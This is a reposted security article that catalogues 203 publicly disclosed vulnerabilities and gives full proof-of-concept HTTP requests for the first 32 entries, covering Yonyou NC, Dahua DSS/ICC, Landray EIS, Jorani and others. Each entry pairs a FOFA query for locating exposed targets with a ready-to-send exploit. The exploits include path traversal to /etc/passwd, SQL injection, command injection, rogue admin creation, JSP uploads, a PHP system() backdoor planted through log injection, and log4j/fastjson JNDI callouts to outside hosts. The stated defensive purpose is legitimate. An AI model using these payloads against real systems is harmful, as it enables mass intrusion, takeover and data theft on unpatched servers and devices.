
Compilation of Publicly Disclosed Internet Vulnerabilities 202309-202406 (repost)

Posted 2024-6-5 14:31:29
Compilation of Publicly Disclosed Internet Vulnerabilities 202309-202406
道一安全 2024-06-05 07:41 Beijing
The following article is sourced from 网络安全新视界; author: 网络安全新视界.

Purpose: exploitation of N-day vulnerabilities makes up a large share of the attacks seen in offensive and defensive engagements; this article is intended to help with defense. Defenders can use its contents to check their own exposure.

Source of vulnerabilities: the article covers 203 POCs for high-severity vulnerabilities publicly disclosed in China and abroad between September 2023 and May 2024. All were collected from other public accounts or websites on the internet and were compiled and published by the 网络安全新视界 team.

Security patches: all vulnerabilities listed are public; for patches or remediation plans, contact the product vendor.

Content: owing to length limits, a few POCs that are too long are replaced uniformly with the word PAYLOAD; search for the full POC yourself if you need it.

Legal rights: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team via the backend to have the relevant content removed.

Statement

To keep things simple and easy to browse, there is no "reply to see the full list" gate. This article is the most complete version available; when using it, press F12 and search for keywords.

Bookmark this article if you need it, or follow the public account (网络安全新视界).

Contents

01

1. StarRocks MPP database unauthenticated access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm (斐讯) router RCE
9. 稻壳CMS (Doccms) keyword unauthenticated SQL injection
10. Landray (蓝凌) EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray (蓝凌) EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT integrated management platform arbitrary file read
21. Dahua ICC intelligent IoT integrated management platform random remote code execution
22. Dahua ICC intelligent IoT integrated management platform log4j remote code execution
23. Dahua ICC intelligent IoT integrated management platform fastjson remote code execution
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo interface SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP system validateLoginName SQL injection
52. Weaver (泛微) E-Office json_common.php SQL injection
53. DPTech (迪普) VPN Service arbitrary file upload
54. Chanjet (畅捷通) T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特脸爱云 one-face-pass smart management platform 1.0.55.0.0.1 privilege bypass
66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. 万户 ezOFFICE wpsservlet arbitrary file upload
68. 万户 ezOFFICE wf_printnum.jsp SQL injection
69. 万户 ezOFFICE contract_gd.jsp SQL injection
70. 万户 ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon (致远) OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon (致远) M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 mobile campus service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction engineering quality supervision system FileUpload.ashx file upload
79. BYTEVALUE (百为) traffic control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. Uniview (宇视科技) video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese tosei self-service laundry machine RCE
87. 安恒明御 security gateway aaa_local_web_preview file upload
88. 安恒明御 security gateway aaa_portal_auth_config_reset remote command execution
89. 致远互联 FE collaborative office platform editflow_manager SQL injection
90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. Qi An Xin 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. Qi An Xin 网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality testing system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. Glodon (广联达) Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. 网康 NS-ASG application security gateway index.php SQL injection
135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立迅 communications command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communications command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communications command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communications command and dispatch platform get_extension_yl.php SQL injection
141. 建科立讯 communications command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire and rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特 CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical image archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景 EHR OutputCode arbitrary file read
169. 宏景 EHR downlawbase SQL injection
170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和 OA C6 FileDownLoad.aspx arbitrary file read
175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体 佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone (山石网科) 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. Cockpit assetsmanager_upload interface file upload
200. SeaCMS (海洋影视管理系统) dmku SQL injection
201. 方正 omnimedia news editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

POC list

02

1. StarRocks MPP database unauthenticated access
FOFA: title="StarRocks"

GET /mem_tracker HTTP/1.1
Host: URL


2. Casdoor static arbitrary file read
FOFA: title="Casdoor"

GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"

GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx


4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Set password to the MD5 hash of your own password.

POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"

GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. Sangfor NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"

GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:


7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"

GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. Phicomm (斐讯) router RCE
FOFA: icon_hash="-1344736688"

After logging in to the backend with the default account admin, perform the following operation:

POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the login in step 1>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. 稻壳CMS (Doccms) keyword unauthenticated SQL injection
FOFA: app="Doccms"

GET /search/index.php?keyword=…
Host: x.x.x.x

The payload is the double URL-encoded form of the following statement:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. Landray (蓝凌) EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file.

POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. Landray (蓝凌) EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"

GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"

Step 1: obtain the cookie.

GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the subsequent requests.

HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

POST request; the planted function executes a base64-encoded command.

POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Send the following request to the lab target to run the id command; the request header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64-encoded command.

GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆 iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"

GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"

The disclosed data includes usernames and passwords.

GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"

The disclosed data includes usernames and passwords.

GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

16. 红帆 HFOffice 医微云 SQL injection
FOFA: title="HFOffice"

The POC calls a database function to compute the MD5 of 1234.

GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. Dahua DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"

POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
        (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>

18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"

GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"

GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. Dahua ICC intelligent IoT integrated management platform arbitrary file read
FOFA: body="*客户端会小于800*"

GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. Dahua ICC intelligent IoT integrated management platform random remote code execution
FOFA: icon_hash="-1935899595"

POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
  "a":{
    "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}

22. Dahua ICC intelligent IoT integrated management platform log4j remote code execution
FOFA: icon_hash="-1935899595"

POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
  "loginName":"${jndi:ldap://dnslog}"
}

23. Dahua ICC intelligent IoT integrated management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"

POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
        {"@type":"java.net.URL","val":"http://DNSLOG"}
        }""
}

24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA: icon_hash="1085941792"

POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
Version: <=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
Version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
